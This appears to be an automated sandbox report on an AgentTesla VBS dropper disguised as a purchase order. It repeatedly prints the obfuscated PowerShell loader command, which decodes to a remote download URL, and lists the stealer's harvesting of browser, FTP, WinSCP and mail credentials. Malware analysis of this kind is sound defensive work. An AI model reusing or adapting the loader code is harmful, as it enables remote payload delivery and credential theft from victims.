Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$allentown = 1;$ordknappestes='substrin';$ordknappestes+='g';function preinterceded($veinwise){$regnorms=$veinwise.length-$allentown;for($jargonium=5; $jargonium -lt $regnorms; $jargonium+=(6)){$woodener+=$veinwise.$ordknappestes.invoke($jargonium, $allentown);}$woodener;}function infatuatedly($beneficeforestillingernes191){. ($subcutaneous) ($beneficeforestillingernes191);}$indknebnes=preinterceded 'hyperm trveo givez straivejr.lovervl cyanagarde/ myto5b.lli.skved0musik appro(acerrw,argaithoseneskadd.lyveoun,epwmahogsforsm midtonunpu.tallus rveja1share0tales.ove,f0sp yd;packw has.wuprodidecimnsemis6upda.4vaude;.saru j mcrxtwinn6 hi c4 ph l;,assa fiberalabavopfin:optag1 tele2under1hlqnu. ant.0uni c) sner ,rwing.lapsemonercwightk trano unhe/clime2bibri0westm1folke0taabe0indsk1 phle0derhj1svrme udligftimeli philr sa.debla,sfjuvalovar gx s,oe/uegen1syda.2thurl1under.tra.y0 slet ';$sevenbommens=preinterceded 'indtru.ecansreilae diplrraphi-deltaab,ckbgskak e ,ikrncodswtincom ';$socionoms=preinterceded 'dativhsole tblaa.t.otlypu ions pr i:trima/uninf/peltidbiscarsolsii,ecapvbankaecalpa.,ortagaktieoforkaos.detgrepubludenrefor l.unac,cmash obygnimbyr e/rud,sule escung.r?syncre ko sxsids.p.rempoinputr l,lit isop= sansdensidomindewfilipn ob.llklyngoeddika,rendddoven&naturik,rofdtro t= samf1 unpaycolliethebae ph njpref.v liteot.grygvandrccoequ5 nasittiresnanskufcomplf marmdi,jur9erind1 allo7.ladd6 ejeremissedwater_taa,t0dyspekblazysrapnd8foderycoteh3chaufysynthn nedirdatakmkommew te n ';$anskaffelsessummerne=preinterceded 'rumne>chann ';$subcutaneous=preinterceded 'routeifor,belysstx.akey ';$mesopodiale='krnikens';infatuatedly (preinterceded 'her.us,ndebestatutst ej-geoaech.lakol.llentenodtreakte apo,nsummeter mi adhsi-homelpskyggasimontb,bonh lles formato duc:.ream\stigmdchagordormiystyrtascrufsdi.re. j,llts.warx ngsetinds, su.p-f ekvvascogaultralskoleudag,oe,nsgn vandh$etherme tadeyeomastrillosrettpchiliomora duptubibyt ea.virkl.uinye tros; fin, ');infatuatedly (preinterceded ' ae iigyrinfradze bjden(prevotunrenet.ggespatibtfratr-necrop evenaro.entkabyshom.in bo.tgtsuper:fa,ri\ richd trior,rdskybolsmapes,isarchi.redbrtdefekxstryctskn,e) nte{ costedoradx,oopri i,rat farl}co.se;diakr ');$knscelle = preinterceded '.nvesepragtcsnknihprovioanker vnin%sor,eahovedpc,untpcountdskopua aniktsamgiacuck %leaka\man,mms peryestrexhumblopostcgcardia espasunde,t forses iklrphon .,ngseokindepce.trvfolke hypot&pseud&misco fo,tyecoloucvigtihgstevo spor alm$udg.a ';infatuatedly (preinterceded 'g.lli$ navlgyderllgalvaocaptibomsteacoryzlevigt: sansb diakostilllproletskovfa skrinrise,tllebr=dis b( tor,c atmommanifdgents formi/.adjacsak.n saf,$stat.kfrondnissensenl rcste,ie dronlbe kelantiken dkm)in,al ');infatuatedly (preinterceded 'slide$centrgtraktln,ncook,ssabcovenafork,lspyds: fretaun,lefaktiot.mbyga orval.evrdesaftekklokkaqu drldobb.eled	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 320, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 320, type: MEMORYSTR

ID:	1430129
Product:	CloudBasic
Start time:	08:04:06
Start date:	23.04.2024
Sample:	Texas_Tool_Purchase_Order#T18834-1.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	85bb05a80334099ded83e21dd686c567
SHA1:	308f10b6208abf4a9c92736c80b6dcb01ca332d2
SHA256:	46d29ed35c7ca72d44d99f3d12603cd11435b6388bf61cd9988e7d375ddbb7b5
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	AB80AD9A08E5B16132325DF5584B2CBE	F7411B7A5826EE6B139EBF40A7BEE999320EF923	5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3v2nqks.jdl.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i555qyuf.ryg.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzvp1f3x.oho.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofqqn2e0.umv.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Myxogaster.Opv	ASCII text, with very long lines (65536), with no line terminators	8C6D47E525B3831BB24E68A04B767D1F	62A53BDB00BBC042FCC91DB99C354EF78A759339	5AFA3B03DF76600B65651B6F13225A81DA7B2FB788E1D596FA0880C31DB653C9

Windows Analysis Report
Texas_Tool_Purchase_Order#T18834-1.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Texas_Tool_Purchase_Order#T18834-1.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Texas_Tool_Purchase_Order#T18834-1.vbs

Malware Threat Intel
Provided by